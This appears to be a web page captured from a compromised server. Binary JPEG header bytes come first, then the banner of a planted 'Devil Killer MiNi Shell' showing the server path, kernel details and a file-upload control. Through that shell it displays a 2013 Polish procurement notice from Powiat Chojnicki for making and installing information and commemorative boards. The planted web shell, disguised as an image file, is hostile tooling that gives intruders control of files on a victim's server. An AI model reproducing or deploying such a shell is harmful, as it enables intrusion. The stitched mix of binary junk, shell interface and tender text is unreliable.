JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130703/132239-N-2013.html

<p class="kh_header"><b>Chojnice: Wykonanie i montaż tablic informacyjnych, pamiątkowych CZĘŚĆ I: wykonanie i montaż tablicy pamiątkowej dla projektu pn. Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, CZĘŚĆ II: wykonanie i montaż 7 tablic informacyjnych, pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska</b><br>
<b>Numer ogłoszenia: 132239 - 2013; data zamieszczenia: 03.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chojnicki , ul. 31 Stycznia 56, 89-600 Chojnice, woj. pomorskie, tel. 052 3966533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i montaż tablic informacyjnych, pamiątkowych CZĘŚĆ I: wykonanie i montaż tablicy pamiątkowej dla projektu pn. Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, CZĘŚĆ II: wykonanie i montaż 7 tablic informacyjnych, pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych p.n.Wykonanie i montaż tablic informacyjnych, pamiątkowych.CZĘŚĆ I: wykonanie i montaż tablicy pamiątkowej dla projektu pn. Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, 
CZĘŚĆ II: wykonanie i montaż 7 tablic informacyjnych, pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, CZĘŚĆ III: wykonanie i montaż tablic informacyjnych (4 szt.) i tablicy pamiątkowej (1 szt.) dla projektu pn. Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013,
Szczegółowe określenie przedmiotu zamówienia zawarte jest w Rozdziale D - SIWZ Opisie Przedmiotu Zamówienia, Rozdziale E- SIWZ Istotnych postanowieniach do umowy oraz załącznikach do SIWZ.
Przedmiotem zamówienia jest wykonanie robót budowlanych p.n.
Wykonanie i montaż tablic informacyjnych, pamiątkowych
CZĘŚĆ I: wykonanie i montaż tablicy pamiątkowej dla projektu pn. Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.
CZĘŚĆ II: wykonanie i montaż 7 tablic informacyjnych,pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.
CZĘŚĆ III: wykonanie i montaż tablic informacyjnych (4 szt.) i tablicy pamiątkowej (1 szt.) dla projektu pn. Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.
Dokumentacja projektowa, specyfikacja techniczna oraz dodatkowe dokumenty przekazane Wykonawcy stanowią część umowy, a wymagania wyszczególnione choćby w jednym z nich są obowiązujące dla Wykonawcy, tak jakby zawarte były w całej dokumentacji.
CZĘŚĆ I
Wykonanie i montaż tablicy pamiątkowej dla projektu Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta zgodnie z projektem budowlanym stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.150.2013 z dnia 19 marca 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót.
Zakres prac:
1.Roboty ziemne i fundamentowe
1)Wykopy jamiste w gruncie kategorii I-II ze skarpami o szerokości dna do 1,5m i głębokości do 1,5m ze złożeniem urobku na odkład - 18,040 m3
2)Podkłady betonowe na podłożu gruntowym z betonu zwykłego - 0,270 m3
3)Stopy fundamentowe żelbetowe schodkowe o objętości do 2,5m3 z układaniem betonu z zastosowaniem pompy - 0,714 m3
4)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,004 t
5)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,012 t
6)Przygotowanie i montaż zbrojenia ze stali żebrowanej w elementach budynków 
i budowli - 0,015 t
7)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 4,360 m2
8)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą -4,360 m2
9)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 1,820 m2
10)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 1,820 m2
11)Zasypanie wykopów z przerzutem ziemi na odległość do 3m i ubiciem warstwami co 15cm w gruncie kategorii I-II - 17,056 m3
12)Wywiezienie i przyjęcie ziemi na wysypisko - 0,984 m3
2.Tablica
1)Dostawa słupa drewnianego z drewna sosnowego litego, zaimpregnowanego, 
o średnicy 16cm z osadzonym płaskownikiem, podstawą słupa oraz elementami stalowymi niezbędnymi do przykręcenia tablic - 2,000 szt.
2)Dostawa i montaż kotew o średnicy M16 i głębokości zakotwienia hef=80mm, hnom=92mm - 8,000 szt.
3)Montaż słupów - 2,000 szt.
4)Dostawa tablicy poliwęglanowej - 1,000 szt.
5)Dostawa tablicy stalowej - 1,000 szt.
6)Montaż tablic - 2,000 szt.
3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 4
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy.
5.Transport tablicy na miejsce oraz wbudowanie zgodnie ze zgłoszeniem robót budowlanych znak AB.6743.150.2013 z dnia 19 marca 2013 r., w uzgodnieniu 
z Zamawiającym (miejscowość Małe Swornegacie) należy do Wykonawcy.
6.Montaż tablicy na punkcie widokowym (nawierzchnia z kostki betonowej) mostu zwodzonego w miejscowości Małe Swornegacie wraz z odtworzeniem nawierzchni - 1 kpl.
Załączniki do CZĘŚCI I:
załącznik nr 1 - zgłoszenie robót budowlanych wraz z projektem,
załącznik nr 2 - specyfikacja techniczna wykonania i odbioru robót,
załącznik nr 3 - przedmiar (dot. cz. I),
załącznik nr 4 - wizualizacja nadruku tablicy pamiątkowej,
CZĘŚĆ II
Wykonanie i montaż 7 tablic informacyjnych,pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, w tym:
a)dwóch tablic zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.175.2013 z dnia 27 marca 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy;
b)pięciu tablic zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.312.2013 z dnia 30 kwietnia 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy.
CZĘŚĆ II a)
Wykonanie i montaż dwóch tablic informacyjnych/pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.175.2013 z dnia 27 marca 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy
Zakres prac przewidywany dla wykonania jednej tablicy:
1.Roboty ziemne i fundamentowe
1)Wykopy jamiste w gruncie kategorii I-II ze skarpami o szerokości dna do 1,5m 
i głębokości do 1,5m ze złożeniem urobku na odkład - 19,866 m3
2)Podkłady betonowe na podłożu gruntowym z betonu zwykłego - 0,272 m3
3)Stopy fundamentowe żelbetowe schodkowe o objętości do 2,5m3 z układaniem betonu z zastosowaniem pompy - 0,628 m3
4)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,003 t
5)Przygotowanie i montaż zbrojenia ze stali żebrowanej w elementach budynków 
i budowli - 0,0125 t
6)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 3,920 m2
7)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 3,920 m2
8)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 1,920 m2
9)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 1,920 m2
10)Zasypanie wykopów z przerzutem ziemi na odległość do 3m i ubiciem warstwami co 15cm w gruncie kategorii I-II - 18,966 m3
11)Wywiezienie i przyjęcie ziemi na wysypisko - 0,900 m3
2.Tablica
1)Dostawa gotowej konstrukcji stalowej malowanej proszkowo (słupki 2 x RO 101.6x4, dług. 4,8m, poprzeczki 2 x RO 42.2x3.2, dług. 2,1m, przewiązki RO 32x2, usztywnienie - płaskownik 30x2, obramowanie - kątownik - 122,034 kg
2)Montaż słupków stalowych (ustawienie na etapie zalewania stóp fundamentowych) - 2,000 szt.
3)Dostawa tablicy stalowej - 1,000 szt.
4)Montaż tablicy - 1,000 szt.
3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 8
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy. 
5.Transport i montaż tablicy zgodnie ze zgłoszeniem robót budowlanych znak AB.6743.175.2013 z dnia 27 marca 2013 r., w uzgodnieniu z Zamawiającym  należy do Wykonawcy.
Załączniki do CZĘŚCI IIa:
załącznik nr 5 - zgłoszenie robót budowlanych wraz z projektem,
załącznik nr 6 - specyfikacja techniczna wykonania i odbioru robót,
załącznik nr 7 - przedmiar (dot. cz. IIa) - przedmiar opracowany dla wykonania jednej tablicy,
załącznik nr 8 - wizualizacja nadruku tablicy pamiątkowej,
CZĘŚĆ II b)
Wykonanie i montaż pięciu tablic informacyjnych, pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.312.2013 z dnia 30 kwietnia 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy
Zakres prac przewidywany dla wykonania jednej tablicy:
1.Roboty ziemne i fundamentowe
1)Wykopy jamiste w gruncie kategorii I-II ze skarpami o szerokości dna do 1,5m 
i głębokości do 1,5m ze złożeniem urobku na odkład - 18,040 m3
2)Podkłady betonowe na podłożu gruntowym z betonu zwykłego - 0,270 m3
3)Stopy fundamentowe żelbetowe schodkowe o objętości do 2,5m3 z układaniem betonu z zastosowaniem pompy - 0,714 m3
4)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,004 t
5)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,012 t
6)Przygotowanie i montaż zbrojenia ze stali żebrowanej w elementach budynków i budowli - 0,015 t
7)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 4,360 m2
8)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą -4,360 m2
9)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 1,820 m2
10)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 1,820 m2
11)Zasypanie wykopów z przerzutem ziemi na odległość do 3m i ubiciem warstwami co 15cm w gruncie kategorii I-II - 17,056 m3
12)Wywiezienie i przyjęcie ziemi na wysypisko - 0,984 m3
2.Tablica
1)Dostawa słupa drewnianego z drewna sosnowego litego, zaimpregnowanego, 
o średnicy 16cm z osadzonym płaskownikiem, podstawą słupa oraz elementami stalowymi niezbędnymi do przykręcenia tablic - 2,000 szt.
2)Dostawa i montaż kotew o średnicy M16 i głębokości zakotwienia hef=80mm, hnom=92mm - 8,000 szt.
3)Montaż słupów - 2,000 szt.
4)Dostawa tablicy poliwęglanowej - 1,000 szt.
5)Dostawa tablicy stalowej - 1,000 szt.
6)Montaż tablic - 2,000 szt.
3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 12
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy.
5.Transport i montaż tablicy zgodnie ze zgłoszeniem robót budowlanych znak AB.6743.312.2013 z dnia 30 kwietnia 2013 r., w uzgodnieniu z Zamawiającym należy do Wykonawcy.
Załączniki do CZĘŚCI IIb:
załącznik nr 9 - zgłoszenie robót budowlanych wraz z projektem,
załącznik nr 10 - specyfikacja techniczna wykonania i odbioru robót,
załącznik nr 11 - przedmiar (dot. cz. IIb) - przedmiar opracowany dla wykonania jednej tablicy,
załącznik nr 12 - wizualizacja nadruku tablicy pamiątkowej,
CZĘŚĆ III
Przedmiotem zamówienia jest: wykonanie i montaż tablic informacyjnych (4 szt.) i tablicy pamiątkowej (1 szt.) dla projektu pn. Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, zgodnie z opisem tablic.
Zakres prac:
1.Tablice informacyjne i pamiątkowa jednostronne, kolorowe na dwóch metalowych słupach trwale związane z gruntem, wkopane w grunt na ok. 0,75 m.
2.Słupki w części podziemnej z podwójnymi poprzeczkami zalane betonem. Fundament betonowy o wymiarach: 0,75 m x 0,45 m x 0,45 m.
3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 2.
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy.
5.Transport tablic na miejsce oraz wbudowanie zgodnie ze zgłoszeniem robót budowlanych, w uzgodnieniu z Zamawiającym, należy do Wykonawcy:
a)tablice informacyjne:
działka nr 2021/15, ul. Świętopełka 1a, Chojnice
działka nr 2212, ul. Dworcowa 1, Chojnice
działka nr 2021/7, ul. Świętopełka 3, Chojnice
działka nr 404/1, ul. Szkolna 3, Czersk
b)tablica pamiątkowa:
działka nr 512/45, ul. Ogrodowa 2, Brusy
Załączniki do CZĘŚCI III:
załącznik nr 1 - zgłoszenie robót budowlanych wraz z opisem tablic,
załącznik nr 2 - wizualizacja nadruku tablic informacyjnych i tablicy pamiątkowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium: nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie potencjału technicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponowali osobami:
- minimum 1 osobą na stanowisko Kierownika robót posiadającą uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej
wymagane przepisami ustawy Prawo Budowlane (j. t. Dz. U. z 2010r.Nr 243, poz. 1623 ze zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578 ze zm.) lub innymi równoważnymi uprawnieniami umożliwiającymi wykonanie tych samych czynności do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej samej specjalności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie sytuacji ekonomicznej i finansowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wypełniony formularz - druk OFERTA - wg załącznika - Rozdział. B do  SIWZ, oraz niżej wymienione dokumenty:
a) Dokumenty wymienione w dziale IX niniejszej SIWZ
b) INNE DOKUMENTY WYMAGANE OD WYKONAWCÓW:
-Zobowiązanie o współpracy - wg załącznika nr 6 do siwz.
-Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom - wg załącznika nr 7 do siwz.
-Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 8 do siwz.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości, zgodnie z § 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( poz. 231).
